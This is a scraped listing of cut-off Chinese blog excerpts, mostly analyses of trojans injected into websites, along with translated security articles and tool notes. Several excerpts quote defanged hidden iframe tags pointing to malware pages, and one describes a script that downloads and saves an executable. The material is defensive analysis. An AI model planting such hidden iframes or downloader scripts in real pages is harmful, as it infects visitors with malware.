其他

來自：CSDN學過電腦的人大都知道“演算法+資料結構=程式”這一著名公式，提出該公式的正是1984年的圖靈獎獲得者，瑞士電腦科學家尼克勞斯•威茨(Niklaus

來源：http://www.zdnet.com.cn/developer/webdevelop/story/0,3800067013,39383734,00.htm作者： Phillip Perkins*purpleendurer修正了原文中的一些錯誤你可以通過IE為你的HTML元素添加行為，建立物件導向的頁面設計方法。Phillip Perkins建立了一個<DIV>對象，當使用者拖動它時，它會在限定的<DIV>內繼續定向運行。Macromedia

endurer 原創2007-03-08 第1版網站首頁包含代碼：/---＜iframe src="hxxp://2007.ads***3721.com/0*2**0***1.htm" width="0" height="0"＞＜/iframe＞---/hxxp://2007.ads***3721.com/0*2**0***1.htmKaspersky 報為 Trojan-Downloader.VBS.Small.dv，其中包含VBScript程式，功能是解密變數a的值並執行。相關代碼為：/--

數位相機儲存卡居然帶system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fcendurer 原創2007-10-16 第1版今天用讀卡機 讀取 相機儲存卡中的PP，不想卡裡居然有 autorun.inf  和

endurer原創註：“百度”一詞總令人想起辛棄疾《青玉案》中的名句：“眾裡尋她千百度，驀然回首，人卻在燈火闌珊處”。而www.baidu.com作為網路協會點名的十大流氓軟體的廠商之一，居然也用這個詞，實在有損辛棄疾《青玉案》的形象。故對於www.baidu.com，本人一率用baidu來表示。近來“baidu更懂中文”系列廣告片等甚是囂張，不過也正好使baidu那淺薄的文化水平的“馬腳”露出來了。以所謂的“baidu唐伯虎篇”為例，“baidu”一名並不源自唐伯虎，卻請唐伯虎出來做廣告，可謂

文學論壇掛的馬變為 Worm.Win32.QQPass.a / 0.exeendurer 原創2007-08-31 第1版檢查發現網頁中包含代碼：/---＜iframe src="hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907" width="0" height="0" frameborder="0"＞＜/iframe＞---/hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907 包含代碼：/---＜script

作者： techrepublic.com.com最近，FBI向人們證明了這樣一個事實，人們可以很容易的分析攻擊有線等效加密，從而可以獲得那些使用了這個安全性通訊協定的無線網路的訪問權。根據這個公告，Jonathan

2007-08-30增加對登入通知項的掃描，在LOG中的標記為 O202007-08-16這段時間忙著寫監控autorun.inf的小東東，現已完成了90%，也許下周可以發一個beta測試版……在這之前，寫了一個提取可疑檔案說明符的網頁，用來提取分析後的log中的可疑項中的檔案說明符2007-06-231、這個新增的 啟動項 是在　瑞星卡卡安全助手 裡發現的2、發現Windows 

endurer 原創2006-10-25 第1版 網頁首部被兩次加入代碼：/---------＜iframe height＝0 width＝0 src＝"hxxp://ip-i*e.www***113.cnidc.cn/wm**/"＞＜/iframe＞----------/wm**.htm   （Kaspersky 報為 Trojan-Downloader.VBS.Psyme.cy）             的內容為 escape( ) 加密的代碼，解密後的內容為一段 JavaScript

;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<; FileName: VerInfo3.asm;  Function: Demo

遭遇一堆 Trojan.PSW.Win32.OnlineGames / *door0.dll等3endurer 原創2007-08-30 第1版再貼一下部分惡意程式檔案的資訊。僅就 報的病毒名來看，Kaspersky 還挺牛的。檔案說明符 : C:/WINDOWS/system32/mhdoor0.dll屬性 : A---擷取檔案版本資訊大小失敗!建立時間 : 2004-8-16 8:39:14修改時間 : 2004-8-16 8:39:14訪問時間 : 2007-8-27 0:0:0大小 :

Skype could provide botnet controlsSkype可提供殭屍網路控制by  Joris Evers作者:Joris Evers翻譯:endurer2006-02-17　第1版Keywords:  VoIP and IP telephony | Security threats | Hacking | Spam and phishing | Viruses and worms關鍵字:VoIP 和 IP telephony | 安全威脅 | Hacking |

某論壇所用計數器利用 PPStream,Thunder等漏洞傳播Trojan.PSW.Win32.OnlineGames.xzr等endurer 原創2007-09-04 第1版剛才開啟本地最近建立的一個網站的論壇時，Kaspersky 報告已檢測 惡意程式 Exploit.HTML.IframeBof.檢查網頁代碼，發現問題出在論壇所用的計數器上：/---＜script language="JavaScript" charset="gb2312" type="text/javascript"

別以為用了防毒保護程式就高枕無憂了作者：Joe Rosberg翻譯: endurer  2007-10-19 第1版分類：視窗, 協助案頭標籤：防火牆，抗病毒，威脅，病毒，Rich Skrenta, Joe Rosberg英文來源:http://blogs.techrepublic.com.com/helpdesk/?p=95&tag=nl.e102　　如果理查德·斯倫塔(Richard

endurer 原創2007-03-05 第1版開啟該城市地圖網站的網頁，瑞星警告發現：Hack.Exploit.Vml.g。檢查網頁，發現網頁所引用的 images/ad.js 包含代碼：/---document.writeln("＜iframe src=/"hxxp:////m***m**.k****is*163.com//index.html?id=5 /" width=0

文學論壇掛的馬 Worm.Win32.QQPass.a 的簡單分析endurer 原創2007-09-02 第1版這回掛的跟 上回那個 Worm.Win32.Agent.imh (見:文學論壇掛的馬 Worm.Win32.Agent.imh 的簡單分析)很相似。0.exe 採用UPX1加殼脫殼前：檔案說明符 : d:/test/0.exe屬性 : A---擷取檔案版本資訊大小失敗!建立時間 : 2007-8-31 19:3:13修改時間 : 2007-8-31 19:3:22訪問時間 : 200

endurer 原創2006-12-15 第1版 論壇首被加入代碼：/--------＜iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0＞＜/iframe＞--------/wm.htm 的內容為JavaScript指令碼程式，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下載檔案 /mc/game/lpf.exe，儲存為

endurer　原創2006-03-08　第5版 補充：經測試，通過“添加刪除程式”裡的RichMedia並不能完全卸載“很棒小秘書”，不過  O10 - Unknown file in Winsock LSP: c:/windows/system32/hbmter.dll 會被清除。詳見：掃出100多個病毒,3個隱藏進程 2006-02-18　第4版 補充：瑞星關於bcsysnote.exe的回複寄件者：send@rising.net.cn  發送時間：2006-02-18

endurer 原創2007-02-28 第1版該網站的網頁末被加入代碼：/------＜iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/xskj.htm width=0 height=0＞＜/iframe＞＜iframe src=hxxp://user**.f**r**e*e.7***7169.net/y**j*1*6***6/kh0.htm width=0 height=0＞＜/iframe＞＜script

PurpleEndurer 原創2006-12-16 第1版有網友反映，在使用 FileInfo 0.0.0002（你可以到 http://purpleendurer.ys168.com 下載）的過程中，有時顯示出來的檔案資訊是交錯的。研究了一下，發現出現這種情況的原因是添加檔案資訊時，游標沒有被移到用來顯示資訊的edit控制項末尾引起的。偶明明在添加資訊前調用了下面這個宏：/---------m_GotoEnd MACRO